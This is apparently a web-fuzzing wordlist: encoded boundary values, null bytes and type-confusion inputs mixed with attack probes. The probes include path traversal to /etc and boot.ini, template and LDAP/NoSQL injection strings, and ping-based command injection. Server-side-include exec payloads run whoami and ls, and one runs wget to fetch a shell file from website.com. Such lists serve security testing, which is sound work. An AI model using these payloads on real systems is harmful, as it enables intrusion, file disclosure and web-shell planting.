%252Fetc%252Fzoph%252Fapache.conf
%252Fetc%252Fzgv.conf
php%253A%252F%252F%252Fetc%252Fzedxrc
php%253A%252F%252F%252Fetc%252Fzgv.conf
php%253A%252F%252F%252Fetc%252Fzlibc.conf
php%253A%252F%252F%252Fetc%252Fzonecheck%252Fafnic.profile
php%253A%252F%252F%252Fetc%252Fzoidrc
php%253A%252F%252F%252Fetc%252Fzhcon.conf
php%253A%252F%252F%252Fetc%252Fzonecheck%252Fde.profile
..%252F..%252F..%252F..%252F..%252F..%252F
..%252F
.%252F
%2522%2522%2522
%255C%252F
%2527%2527%2527
%2560%2560%2560%2560
%2522%2522%2522%2522
%2527%2527%2527%2527
%253A
%2560%2560%2560
%2525
.
%2521
%253F
.%253F
.%2521
%2521%2521
%2526quote
%257C%257C
%253F%253F
%255B%2527%255D
%255C%2522blah
%2526gt
%2526lt
00100
%255C%2527
%255C
%255B%2526apos%253B%255D
%255C%2526apos%253B
100.00
100%252B
%252B100
100%252C00
100-
100
%2524100
%2524-100
-100
-%2524100
%25C2%25A3100
-%25C2%25A3100
%25C2%25A3-100
%25E2%2582%25AC-100
%25E2%2582%25AC100
%2528%2529
-%25E2%2582%25AC100
%2528%2522100%2522%2529
%2528%252C%252C%2529
%2528100%2529
%2528100%252C101%2529
%255B%255D
%255B100%255D
%2528%2522100%2522%252C%2522101%2522%2529
%255B%252C%252C%255D
%255B%2522100%2522%255D
%257B100%257D
%257B%257D
%255B%2522100%2522%252C%2522101%2522%255D
%257B%2522100%2522%257D
%257B100%252C101%257D
%255B100%252C101%255D
99
%257B%2522100%2522%252C%2522101%2522%257D
NaN
101
-NaN
inf
Infinity
-Infinity
0b1100100
-inf
%2526h00
%2526hff
0x64
1e-50
0.00000000000000000000000000000000000000000000000001
100e0
100e1
false
100e-1
true
-1
1
0
%252B1
%252B0
%257B%252C%252C%257D
-0
None
null
An+Array
nil
1%252C%252C0%252C%252C0
%252520%252509100
-2147483648
100%252520%252500%252500
4294967295
2147483647
2147483648
99999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
-2147483649
4294967296
%252500
999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
-9999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
9999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
%252502
%252501
%252504
%252506
%252505
%252507
%252508
%25250a
%252503
%252509
%25250c
%25250e
%25250d
%25250b
%25250d
%25250f
%2525bf
nil
%25250d%25250a
null
%25250a
None
Nil
NULL
Null
NIL
NONE
none
%255C0
%255C00
%255Cu0000
%255Cx00
u%252B0000
U%252B0000
%255C000
u0000
0
%252500
2.07564741538e%252B16
16649142472222295162770764775
-139333426276771806651771
0x481b49d0f8d5a3e7f821066157c37c
9223372036854775807
3.38800266804e%252B16
9223372036854775808
1.79769313486e%252B308
-9223372036854775809
-1.97684995314e%252B16
2139095040
79228162514264337593543950336L
2.22507385851e-308
1.79769313486e%252B308
79228162514264337593543950336l
inf
Infinity
NaN
65535
255
-Infinity
18446744073709551615
256
65536
4294967295
127
4294967296
18446744073709551616
32767
9223372036854775807
2147483647
32768
9223372036854775808
-32768
128
2147483648
-128
-9223372036854775808
-2147483648
-32769
-129
-9223372036854775809
-2147483649
79228162514264337593543950336B
administrator
admin
home
about
portal
index
user
dashboard
api
health
v1
v2
users
page
test
v3
main
ping
.htaccess
root
core
primary
desktop
desk
search
discover
contact
help
gallery
files
declare
content
true
defined
images
undefined
unkown
allow
go
false
none
fail
goto
ok
pass
proper
failure
improper
access
trace
missing
admin
system
administrator
login
logon
valid
logoff
status
invalid
service
fail
info
warning
test
testing
ok
demo
debug
verbose
goto
lock
locked
image
build
make
document
install
enable
file
new
disable
%253Cz%253E%2522z%2527z%2560%2525%257D%257D%2529z%2524%257B%257Bz%255C
%2521%2540%2523%2524%2525%2525%255E%2523%2524%2525%2523%2524%2540%2523%2524%2525%2524%2524%2540%2523%2524%2525%255E%255E%252A%252A%2528%2528%2529
%2521%2540%25230%2525%255E%25230%2523%2523018387%2540%25230%255E%255E%252A%252A%2528%2528%2529
%252B
+
%25252b
%255Cu0020
%252520
%255C040
%255Cx20
42%252A42
%255Cu%257B0020%257D
%257B%257B42%252A42%257D%257D
%255C40
%257B42%252A42%257D
%2523%257B42%252A42%257D
%257B%257B%257B42%252A42%257D%257D%257D
unlock
%2524%257B42%252A42%257D
%253C%2525%253D42%252A42+%2525%253E
%257B%255Exyzm42%257D1764%257B%252Fxyzm42%257D
%257B%257B%253D42%252A42%257D%257D
%255B%255B%2524%257B42%252A42%257D%255D%255D
%2524%257Bdonotexists%257C42%252A42%257D
1
0
True
true
false
False
DEV.APP.SVRCONN
DEV.ADMIN.SVRCONN
SYSTEM.AUTO.RECEIVER
SYSTEM.DEF.CLUSRCVR
SYSTEM.DEF.CLUSSDR
SYSTEM.ADMIN.SVRCONN
SYSTEM.DEF.RECEIVER
SYSTEM.AUTO.SVRCONN
SYSTEM.DEF.SENDER
SYSTEM.DEF.REQUESTER
SYSTEM.DEF.SERVER
SYSTEM.DEF.SVRCONN
SYSTEM.DEBUG
SYSTEM.OK
SYSTEM.ERROR
SYSTEM.FAIL
SYSTEM.TRACE
debug
SYSTEM.TRACK
dump
app.self
app.debug
app.dump
self
_self
app.config
this
.this
1229%23%26x51;1345
_this
%2524this
1229%25511345
1229%5Cx511345
1229%5Cu00511345
1229%511345
1229U+00511345
13333337
%7Bnone.__dict__%7D
%7B%5C&%2339;%5C&%2339;%7D
%5C0
$6
1.79769313486e+308
%7B0%7D
$3
%7B%5C&%2334;%5C&%2334;%7D
%5Cr
%09
$9
%7B&%2339;&%2339;%7D
$2
%5C%5C
$1
%08
9223372036854775808
%00
%0c
%5Cn
%0d
2.07564741538e+16
2139095040
%7Bself%7D
%7Bthis%7D
%5C%20
$5
$8
%5Cb
16649142472222295162770764775
%7B%60%60%7D
$4
%0a
%5Cf
-1.97684995314e+16
%7B%7B%7D.__dict__%7D
%7B&%2339;&%2339;.__class__%7D
-9223372036854775809
1.79769313486e+308
-139333426276771806651771
$7
79228162514264337593543950336L
%5Ct
%5c
3.38800266804e+16
%7B$this%7D
0x481b49d0f8d5a3e7f821066157c37c
$0
9223372036854775807
%7B&%2334;&%2334;%7D
256
79228162514264337593543950336B
128
%26%2334;%26gt;xxx%26lt;P%26gt;yyy
%23xA%23xD
&%2334;%5Ct&%2334;
%23%26%2339;
%23
18446744073709551615
4294967295
-Infinity
9223372036854775807
2147483647
%23%26amp;apos;
-9223372036854775808
9223372036854775808
-32769
-32768
2147483648
-128
79228162514264337593543950336l
4294967296
!%26%2339;
255
inf
2.22507385851e-308
%26%2334;%26gt;%26lt;script%26gt;%26%2334;
-2147483648
-9223372036854775809
127
Infinity
32768
NaN
-129
-2147483649
32767
18446744073709551616
65535
%23xD%23xA
65536
%0a
$null
%00/
%20
%01%02%03%04%0a%0d%0aADSF
%00
%23xD
%23xA
%2500
$NULL
%250a
%20%7C
%2A
%3C%3F
%2C
%2e%2e%2f
%7C
%5C
%5C/
%60
%26amp;%2310;
%26amp;%2313;%26amp;%2310;
%26amp;%2310;%26amp;%2313;
%26amp;quot;;id%26amp;quot;
*%26amp;apos;
*%26%2339;
%26amp;apos;
*
(%26%2339;)
%26amp;%2313;
+%00
%2A%7C
--
-
-1.0
-1
-20
..%255c
-268435455
-2
/%00/
@%26amp;apos;
/%2A
..%c0%af
%3Fx=%26gt;
1
%26lt;%20%20script%20%26gt;%20%26lt;%20/%20script%26gt;
%26lt;!--%23exec%20cmd=%26%2334;ls%26%2334;%20--%26gt;
%3Fx=%7C
..%5c
%26lt;%3F
%26lt;pre%26gt;%26lt;!--%23exec%20cmd=%26%2334;whoami%26%2334;--%26gt;%26lt;/pre%26gt;
%26lt;pre%26gt;%26lt;!--%23exec%20cmd=%26%2334;dir%26%2334;%20--%26gt;%26lt;/pre%26gt;
%3Fx=
/%26%2339;
..%25%35%63
%26lt;pre%26gt;%26lt;!--%23exec%20cmd=%26%2334;ls%26%2334;%20--%26gt;%26lt;/pre%26gt;
..%5C
@%26%2339;
%26lt;pre%26gt;%26lt;!--%23echo%20var=%26%2334;DATE_LOCAL%26%2334;%20--%26gt;%20%26lt;/pre%26gt;
NULL
65536
;
%3Fx=%26%2334;
%26lt;!--%23exec%20cmd=%26%2334;/bin/ls%20/%26%2334;%20--%26gt;
%26lt;!--%23echo%20var=%26%2334;server_addr%26%2334;%20--%26gt;
2147483647
../
A
2
/
00
/%26amp;apos;
0
0xfffffff
FALSE
TRUE
268435455
1.0
%26lt;!--%23exec%20cmd=%26%2334;wget%20http://website.com/dir/shell.txt%26%2334;%20--%26gt;
%26lt;!--%23exec%20cmd=%26%2334;dir%26%2334;%20--%26gt;
%26lt;!--%23echo%20var=%26%2334;script_url%26%2334;%20--%26gt;
%26lt;!--%23echo%20var=%26%2334;server_admin%26%2334;%20--%26gt;
%26lt;!--%23echo%20var=%26%2334;script_name%26%2334;%20--%26gt;
%26lt;!--%23echo%20var=%26%2334;netsite_root%26%2334;%20--%26gt;
%26lt;!--%23echo%20var=%26%2334;script_uri%26%2334;%20--%26gt;
%26lt;!--%23echo%20var=%26%2334;script_filename%26%2334;%20--%26gt;
%26lt;!--%23echo%20var=%26%2334;path_translated%26%2334;%20--%26gt;
%26lt;!--%23echo%20var=%26%2334;site_htmlroot%26%2334;%20--%26gt;
%26lt;!--%23echo%20var=%26%2334;request_uri%26%2334;%20--%26gt;
%26lt;!--%23echo%20var=%26%2334;path_info_translated%26%2334;%20--%26gt;
%26lt;!--%23echo%20var=%26%2334;remote_user%26%2334;%20--%26gt;
%26lt;!--%23echo%20var=%26%2334;request_method%26%2334;%20--%26gt;
%26lt;!--%23echo%20var=%26%2334;http_client_ip%26%2334;%20--%26gt;
%26lt;!--%23echo%20var=%26%2334;remote_ident%26%2334;%20--%26gt;
%26lt;!--%23echo%20var=%26%2334;remote_addr%26%2334;%20--%26gt;
%26lt;!--%23echo%20var=%26%2334;remote_port%26%2334;%20--%26gt;
%26lt;!--%23echo%20var=%26%2334;query_string_unescaped%26%2334;%20--%26gt;
%26lt;!--%23echo%20var=%26%2334;remote_host%26%2334;%20--%26gt;
%26lt;!--%23echo%20var=%26%2334;path_translated%26%2334;%20--%26gt;
%26lt;!--%23echo%20var=%26%2334;last_modified%26%2334;%20--%26gt;
%26lt;!--%23echo%20var=%26%2334;page_count%26%2334;%20--%26gt;
%26lt;!--%23echo%20var=%26%2334;path_info%26%2334;%20--%26gt;
%26lt;!--%23echo%20var=%26%2334;path%26%2334;%20--%26gt;
%26lt;!--%23echo%20var=%26%2334;query_string%26%2334;%20--%26gt;
randomFile.asp
.current_template_name
.version
.locale_object
%26lt;!--%23echo%20var=%26%2334;http_user_agent%26%2334;%20--%26gt;
randomFile.php4
randomFile.aspx
_self
randomFile.txt
randomFile.php3
randomFile.php
randomFile.php5
randomFile.phtml
randomFile.shtm
randomFile.shtml
randomFile.py
randomFile.cfm
randomFile.jsp
randomFile.phtm
randomFile.pl
&%2334;%5Cx00&%2334;
%26%2334;:test%26%2334;
randomFile.jhtml
randomFile.rb
randomFile.cfml
%7B&%2334;1&%2334;:&%2334;0&%2334;%7D
%26%2334;1%26%2334;
%7B%7D
%7B&%2334;0&%2334;:&%2334;%5Cx00&%2334;%7D
%7B&%2334;1&%2334;:0%7D
%7B&%2334;0&%2334;:%5B%5D%7D
%7B&%2334;0&%2334;:%5B1%5D%7D
%7B&%2334;0&%2334;:%5B&%2334;1&%2334;,&%2334;2&%2334;%5D%7D
%7B&%2334;0&%2334;:%5B1,2%5D%7D
%7B&%2334;%5Cx00&%2334;:0%7D
%7B&%2334;%5Cx00&%2334;:&%2334;0&%2334;%7D
%7B&%2334;%5Cx00&%2334;:%5B%5D%7D
%7B&%2334;%5Cx00&%2334;:&%2334;&%2334;%7D
%7B&%2334;%5Cx00&%2334;:%5B1,2%5D%7D
%7B&%2334;_id&%2334;:&%2334;1&%2334;%7D
%7B&%2334;%5Cx00&%2334;:%5B1%5D%7D
%7B&%2334;id&%2334;:&%2334;1&%2334;%7D
%7B&%2334;id&%2334;:1%7D
%7B&%2334;_id&%2334;:1%7D
%7B&%2334;_uid&%2334;:&%2334;1&%2334;%7D
%7B&%2334;uid&%2334;:1%7D
%7B&%2334;uid&%2334;:&%2334;1&%2334;%7D
%7B&%2334;toJSON&%2334;:&%2334;while%281%29;&%2334;%7D
%7B&%2334;toString&%2334;:&%2334;while%281%29;&%2334;%7D
%7D
%7B42%2A42%7D
%7B&%2334;Length&%2334;:999999999999%7D
%7B&%2334;length&%2334;:999999999999%7D
42*42
%7B%7B%7B42%2A42%7D%7D%7D
$%7B42%2A42%7D
%7B%7B42%2A42%7D%7D
%7B%7B=42%2A42%7D%7D
%7B%5Exyzm42%7D1764%7B/xyzm42%7D
%23%7B42%2A42%7D
[%26amp;apos;]
$%7Bdonotexists%7C42%2A42%7D
%5C&amp;apos;
%5C0
%5B%5B$%7B42%2A42%7D%5D%5D
[%26%2339;]
%5C
%5C&%2334;blah
%5C00
%5C&%2339;
%5C00%5C00%5C00
%5C00%5C00
%5C0%5C0%5C0
%5C0%5C0
%5C%5C
%5C%5C%5C%5C%2A
%5C%5C/
%5Ct
%5C%5C%5C%5C%3F%5C%5C
%01%02%03%04%0a%0d%0aADSF
%5E&amp;apos;
%23xA%23xD
%5E&%2339;
%23xD%23xA
%60
t
xsstest%00%26%2334;%26lt;%26gt;%26%2339;
%26lt;foo%26gt;%26lt;/foo%26gt;
%26lt;/foo%26gt;
;
))))))))))
@variable
,@variable
PRINT
PRINT%20@@variable
%7C%20ping%20-n%2030%20127.0.0.1%20%7C
..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5Cboot.ini
../../../../../../../../../../boot.ini
%26amp;%20ping%20-n%2030%20127.0.0.1%20%26amp;
%26amp;%20ping%20-i%2030%20127.0.0.1%20%26amp;
;%20ping%20127.0.0.1%20;
%60ping%20127.0.0.1%60
;echo%20111111
%0a%20ping%20-i%2030%20127.0.0.1%20%0a
id%00
id%00%7C
null
something%00html
%7B&amp;apos;%7D
%7C
%7B&%2339;%7D
%ff%13
%7D
%ff%15
%ff%14
%ff%18
%ff%55
%ff%16
%ff%17
%ff%54
%ff%56
%ff%f9
%ff%f7
%ff%57
%ff%f8
%ff%fb
%ff%fa
false
true
5e-324
1.7976931348623157e+308
5e-10
0.00005
%26amp;apos;XoiZR
%26amp;quot;XoiZR
%26amp;lt;%3FTnn96%20%3F%26amp;gt;
%26amp;lt;Tnn96%26amp;gt;
%26amp;lt;%3F%20Tnn96%20%3F%26amp;gt;
[Tnn96]
(Tnn96)
%7BTnn96%7D
%7B=%20Tnn96%7D
%7B%7BTnn96%7D%7D
*
null
$
%7B%7B=%20Tnn96%7D%7D
@
:
+
-
;
-1
0.1
0
true
/
false
1
0.9
@*
//
//*
*/*
%28
!
%21
%26
%29
%2A%28%7C%28mail%3D%2A%29%29
%2A%28%7C%28objectclass%3D%2A%29%29
%2A%7C
%26amp;
)
(
%2A%28%7C%28objectclass=%2A%29%29
%7C
%2A%28%7C%28mail=%2A%29%29
%2A%7C
//
/
*/*
%2A%28%29%7C&amp;&%2339;
@*
//*
admin*
%2A%29%28uid=%2A%29%29%28%7C%28uid=%2A
%7C
/etc/zedxrc
/etc/zope-extfile.conf
/etc/zedrc
/etc/zgv.conf
php:///etc/zedrc
/etc/zoph/apache.conf
php:///etc/zgv.conf
php:///etc/zedxrc
php:///etc/zonecheck/de.profile
php:///etc/zhcon.conf
../../../../../../
php:///etc/zlibc.conf
php:///etc/zonecheck/afnic.profile
php:///etc/zoidrc
../
%5C/
./
%26%2334;%26%2334;%26%2334;
%26%2334;%26%2334;%26%2334;%26%2334;
%60%60%60%60
%26%2339;%26%2339;%26%2339;
%26%2339;%26%2339;%26%2339;%26%2339;
:
.
!
%60%60%60
.!
%3F
%3F%3F
.%3F
!!
%26amp;lt
%26amp;gt
%7C%7C
%26amp;quote
[%26%2339;]
[%26amp;apos;]
%5C&%2334;blah
%5C
%5C&%2339;
%5C&amp;apos;
00100
100.00
100,00
100+
100
+100
-100
$-100
100-
$100
%C2%A3100
-$100
-%C2%A3100
%C2%A3-100
%E2%82%AC-100
%E2%82%AC100
()
-%E2%82%AC100
(,,)
(100)
(%26%2334;100%26%2334;)
(100,101)
[]
(%26%2334;100%26%2334;,%26%2334;101%26%2334;)
[100]
[%26%2334;100%26%2334;]
[100,101]
[,,]
%7B%7D
[%26%2334;100%26%2334;,%26%2334;101%26%2334;]
%7B,,%7D
%7B100%7D
%7B&%2334;100&%2334;,&%2334;101&%2334;%7D
NaN
%7B100,101%7D
%7B&%2334;100&%2334;%7D
99
101
Infinity
inf
0b1100100
-Infinity
-inf
-NaN
0x64
0.00000000000000000000000000000000000000000000000001
%26amp;h00
%26amp;hff
100e0
100e1
100e-1
false
true
1e-50
1
-1
0
-0
+0
None
+1
null
An%20Array
nil
%20%09100
-2147483648
100%20%00%00
1,,0,,0
2147483647
4294967295
-2147483649
4294967296
2147483648
99999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
9999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
%00
%02
-9999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
%04
%03
%01
%08
%05
%06
%0b
%0c
%07
%09
%0d
%0f
%0d
%bf
%0a
%0e
%0d%0a
null
%0a
nil
none
None
NULL
Nil
Null
NONE
NIL
%5C0
%5C00
%5Cu0000
%5Cx00
u+0000
%5C000
U+0000
u0000
0
%00
2.07564741538e+16
16649142472222295162770764775
3.38800266804e+16
-139333426276771806651771
0x481b49d0f8d5a3e7f821066157c37c
-1.97684995314e+16
9223372036854775808
1.79769313486e+308
-9223372036854775809
9223372036854775807
2139095040
1.79769313486e+308
79228162514264337593543950336L
79228162514264337593543950336B
2.22507385851e-308
Infinity
79228162514264337593543950336l
NaN
65535
-Infinity
255
18446744073709551615
inf
65536
4294967295
256
18446744073709551616
127
4294967296
32767
2147483647
32768
9223372036854775807
128
9223372036854775808
-32768
-128
-9223372036854775808
-2147483648
2147483648
-32769
-129
-9223372036854775809
administrator
admin
home
about
-2147483649
portal
index
dashboard
user
api
users
v2
health
v1
v3
page
main
.htaccess
ping
test
root
desktop
primary
core
help
discover
contact
search
desk
files
content
gallery
defined
images
declare
true
unkown
undefined
allow
false
none
go
goto
ok
pass
failure
fail
improper
access
proper
trace
missing
admin
system
administrator
login
valid
status
logon
invalid
service
fail
info
logoff
testing
warning
debug
demo
ok
test
verbose
unlock
lock
goto
locked
document
file
image
build
make
new
enable
install
+
%20
disable
%2b
%5Cu0020
%20
%5Cx20
%5C040
%5Cu%7B0020%7D
42*42
%5C40
%7B%7B42%2A42%7D%7D
%7B42%2A42%7D
%23%7B42%2A42%7D
%7B%7B%7B42%2A42%7D%7D%7D
$%7B42%2A42%7D
%7B%5Exyzm42%7D1764%7B/xyzm42%7D
%5B%5B$%7B42%2A42%7D%5D%5D
1
$%7Bdonotexists%7C42%2A42%7D
%7B%7B=42%2A42%7D%7D
0
True
true
false
False
DEV.APP.SVRCONN
SYSTEM.AUTO.RECEIVER
SYSTEM.ADMIN.SVRCONN
DEV.ADMIN.SVRCONN
SYSTEM.DEF.CLUSRCVR
SYSTEM.AUTO.SVRCONN
SYSTEM.DEF.RECEIVER
SYSTEM.DEF.REQUESTER
SYSTEM.DEF.SVRCONN
SYSTEM.DEF.SENDER
SYSTEM.DEF.SERVER
SYSTEM.OK
SYSTEM.DEF.CLUSSDR
SYSTEM.DEBUG
dump
SYSTEM.FAIL
SYSTEM.ERROR
SYSTEM.TRACK
SYSTEM.TRACE
debug
app.debug
app.self
app.config
self
app.dump
this
$this
_this
_self
1229%511345
.this
1229%5Cu00511345
1229U+00511345
1229%25511345
1229%23%26x51;1345
1229%5Cx511345
13333337
%5Cf
%5Cb
%7Bself%7D
$5
$7
%0c
$6
$9
%5C%20
$0
$1
%7B$this%7D
%5Cn
%7Bthis%7D
$3
%5C%5C
%5c
9223372036854775808
1.79769313486e+308
-139333426276771806651771
3.38800266804e+16
%7Bnone.__dict__%7D
1.79769313486e+308
%7B%5C&quot;%5C&quot;%7D
%0a
$2
%7B&%2339;&%2339;%7D
$8
0x481b49d0f8d5a3e7f821066157c37c
2139095040
-1.97684995314e+16
-9223372036854775809
2.07564741538e+16
%00
%5C0
16649142472222295162770764775
%7B&quot;&quot;%7D
%7B%5C&%2339;%5C&%2339;%7D
%09
%7B&%2339;&%2339;.__class__%7D
%0d
%08
%5Ct
$4
%7B0%7D
9223372036854775807
%5Cr
%7B%7B%7D.__dict__%7D
2.22507385851e-308
%7B%60%60%7D
79228162514264337593543950336l
79228162514264337593543950336L
inf
79228162514264337593543950336B
Infinity
255
NaN
65535
4294967295
-Infinity
128
32767
18446744073709551616
65536
2147483647
127
18446744073709551615
4294967296
256
-9223372036854775808
-32768
-129
-2147483649
-2147483648
-128
32768
9223372036854775808
2147483648
9223372036854775807
%23%26amp;apos;
%23%26%2339;
%23
%26quot;%26gt;%26lt;script%26gt;%26quot;
&quot;%5Ct&quot;
!%26%2339;
-9223372036854775809
-32769
%26quot;%26gt;xxx%26lt;P%26gt;yyy
$null
%23xD
%23xD%23xA
%23xA%23xD
%23xA
%2500
%20
%0a
%00/
%00
%01%02%03%04%0a%0d%0aADSF
$NULL
%20%7C
%2C
%250a
%2A
%2e%2e%2f
%5C
%3C%3F
%60
%26amp;%2310;%26amp;%2313;
%7C
%5C/
%26amp;%2310;
%26amp;%2313;
%26amp;apos;
(%26%2339;)
%2A%7C
*%26amp;apos;
%26amp;%2313;%26amp;%2310;
%26amp;quot;;id%26amp;quot;
*%26%2339;
*
-
-1.0
--
-1
+%00
-2
..%25%35%63
-268435455
..%255c
..%5c
-20
/
..%c0%af
..%5C
/%2A
../
/%00/
/%26%2339;
/%26amp;apos;
0
1.0
0xfffffff
2
00
1
;
2147483647
268435455
65536
%26lt;%3F
%3Fx=%26quot;
%26lt;%20%20script%20%26gt;%20%26lt;%20/%20script%26gt;
%3Fx=%7C
@%26%2339;
%3Fx=
@%26amp;apos;
%3Fx=%26gt;
NULL
A
FALSE
%26lt;pre%26gt;%26lt;!--%23exec%20cmd=%26quot;whoami%26quot;--%26gt;%26lt;/pre%26gt;
%26lt;pre%26gt;%26lt;!--%23exec%20cmd=%26quot;ls%26quot;%20--%26gt;%26lt;/pre%26gt;
TRUE
%26lt;pre%26gt;%26lt;!--%23exec%20cmd=%26quot;dir%26quot;%20--%26gt;%26lt;/pre%26gt;
%26lt;pre%26gt;%26lt;!--%23echo%20var=%26quot;DATE_LOCAL%26quot;%20--%26gt;%20%26lt;/pre%26gt;
%26lt;!--%23exec%20cmd=%26quot;ls%26quot;%20--%26gt;
%26lt;!--%23exec%20cmd=%26quot;dir%26quot;%20--%26gt;
%26lt;!--%23echo%20var=%26quot;server_addr%26quot;%20--%26gt;
%26lt;!--%23exec%20cmd=%26quot;/bin/ls%20/%26quot;%20--%26gt;
%26lt;!--%23exec%20cmd=%26quot;wget%20http://website.com/dir/shell.txt%26quot;%20--%26gt;
%26lt;!--%23echo%20var=%26quot;script_url%26quot;%20--%26gt;
%26lt;!--%23echo%20var=%26quot;script_uri%26quot;%20--%26gt;
%26lt;!--%23echo%20var=%26quot;script_name%26quot;%20--%26gt;
%26lt;!--%23echo%20var=%26quot;server_admin%26quot;%20--%26gt;
%26lt;!--%23echo%20var=%26quot;site_htmlroot%26quot;%20--%26gt;
%26lt;!--%23echo%20var=%26quot;path_translated%26quot;%20--%26gt;
%26lt;!--%23echo%20var=%26quot;netsite_root%26quot;%20--%26gt;
%26lt;!--%23echo%20var=%26quot;request_uri%26quot;%20--%26gt;
%26lt;!--%23echo%20var=%26quot;script_filename%26quot;%20--%26gt;
%26lt;!--%23echo%20var=%26quot;path_info_translated%26quot;%20--%26gt;
%26lt;!--%23echo%20var=%26quot;http_client_ip%26quot;%20--%26gt;
%26lt;!--%23echo%20var=%26quot;remote_user%26quot;%20--%26gt;
%26lt;!--%23echo%20var=%26quot;remote_addr%26quot;%20--%26gt;
%26lt;!--%23echo%20var=%26quot;request_method%26quot;%20--%26gt;
%26lt;!--%23echo%20var=%26quot;remote_ident%26quot;%20--%26gt;
%26lt;!--%23echo%20var=%26quot;remote_port%26quot;%20--%26gt;
%26lt;!--%23echo%20var=%26quot;query_string_unescaped%26quot;%20--%26gt;
%26lt;!--%23echo%20var=%26quot;remote_host%26quot;%20--%26gt;
%26lt;!--%23echo%20var=%26quot;path_translated%26quot;%20--%26gt;
%26lt;!--%23echo%20var=%26quot;query_string%26quot;%20--%26gt;
%26lt;!--%23echo%20var=%26quot;page_count%26quot;%20--%26gt;
%26lt;!--%23echo%20var=%26quot;path%26quot;%20--%26gt;
%26lt;!--%23echo%20var=%26quot;path_info%26quot;%20--%26gt;
%26lt;!--%23echo%20var=%26quot;last_modified%26quot;%20--%26gt;
%26lt;!--%23echo%20var=%26quot;http_user_agent%26quot;%20--%26gt;
.version
randomFile.asp
.locale_object
.current_template_name
randomFile.aspx
randomFile.php4
randomFile.php
randomFile.php3
randomFile.php5
_self
randomFile.txt
randomFile.shtm
randomFile.shtml
randomFile.phtml
randomFile.phtm
randomFile.jhtml
randomFile.pl
randomFile.jsp
&quot;%5Cx00&quot;
randomFile.cfm
randomFile.py
randomFile.rb
randomFile.cfml
%26quot;:test%26quot;
%26quot;1%26quot;
%7B&quot;1&quot;:&quot;0&quot;%7D
%7B&quot;1&quot;:0%7D
%7B&quot;0&quot;:&quot;%5Cx00&quot;%7D
%7B%7D
%7B&quot;0&quot;:%5B&quot;1&quot;,&quot;2&quot;%5D%7D
%7B&quot;%5Cx00&quot;:0%7D
%7B&quot;%5Cx00&quot;:&quot;0&quot;%7D
%7B&quot;0&quot;:%5B1,2%5D%7D
%7B&quot;0&quot;:%5B1%5D%7D
%7B&quot;%5Cx00&quot;:%5B%5D%7D
%7B&quot;0&quot;:%5B%5D%7D
%7B&quot;%5Cx00&quot;:&quot;&quot;%7D
%7B&quot;%5Cx00&quot;:%5B1,2%5D%7D
%7B&quot;%5Cx00&quot;:%5B1%5D%7D
%7B&quot;id&quot;:1%7D
%7B&quot;_id&quot;:&quot;1&quot;%7D
%7B&quot;_id&quot;:1%7D
%7B&quot;uid&quot;:&quot;1&quot;%7D
%7B&quot;uid&quot;:1%7D
%7B&quot;id&quot;:&quot;1&quot;%7D
%7B&quot;_uid&quot;:&quot;1&quot;%7D
%7B&quot;toJSON&quot;:&quot;while%281%29;&quot;%7D
42*42
%7B&quot;Length&quot;:999999999999%7D
%7B&quot;length&quot;:999999999999%7D
%7D
%7B&quot;toString&quot;:&quot;while%281%29;&quot;%7D
%7B%7B42%2A42%7D%7D
%7B42%2A42%7D
$%7B42%2A42%7D
%23%7B42%2A42%7D
%7B%7B=42%2A42%7D%7D
$%7Bdonotexists%7C42%2A42%7D
%7B%7B%7B42%2A42%7D%7D%7D
%7B%5Exyzm42%7D1764%7B/xyzm42%7D
[%26amp;apos;]
%5B%5B$%7B42%2A42%7D%5D%5D
[%26%2339;]
%5C0
%5C&quot;blah
%5C&amp;apos;
%5C
%5C&%2339;
%5C00%5C00%5C00
%5C00
%5C00%5C00
%5C0%5C0
%5C0%5C0%5C0
%5C%5C%5C%5C%2A
%5C%5C
%5C%5C/
%5Ct
%01%02%03%04%0a%0d%0aADSF
%23xA%23xD
%5C%5C%5C%5C%3F%5C%5C
%5E&%2339;
%5E&amp;apos;
%23xD%23xA
%60
t
%26lt;foo%26gt;%26lt;/foo%26gt;
))))))))))
xsstest%00%26quot;%26lt;%26gt;%26%2339;
%26lt;/foo%26gt;
;
@variable
PRINT%20@@variable
PRINT
,@variable
%7C%20ping%20-n%2030%20127.0.0.1%20%7C
..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5Cboot.ini
%26amp;%20ping%20-i%2030%20127.0.0.1%20%26amp;
../../../../../../../../../../boot.ini
;%20ping%20127.0.0.1%20;
%26amp;%20ping%20-n%2030%20127.0.0.1%20%26amp;
%0a%20ping%20-i%2030%20127.0.0.1%20%0a
%60ping%20127.0.0.1%60
null
id%00
id%00%7C
something%00html
;echo%20111111
%7C
%7B&amp;apos;%7D
%7B&%2339;%7D
%ff%13
%ff%15
%7D
%ff%14
%ff%17
%ff%16
%ff%54
%ff%56
%ff%55
%ff%18
%ff%f7
%ff%f8
%ff%57
%ff%f9
%ff%fb
false
%ff%fa
5e-324
true
0.00005
1.7976931348623157e+308
%26amp;quot;XoiZR
5e-10
%26amp;apos;XoiZR
%26amp;lt;%3F%20Tnn96%20%3F%26amp;gt;
[Tnn96]
%26amp;lt;%3FTnn96%20%3F%26amp;gt;
(Tnn96)
%26amp;lt;Tnn96%26amp;gt;
%7B=%20Tnn96%7D
%7BTnn96%7D
%7B%7BTnn96%7D%7D
@
*
%7B%7B=%20Tnn96%7D%7D
$
null
+
-
:
;
-1
0.1
1
0
0.9
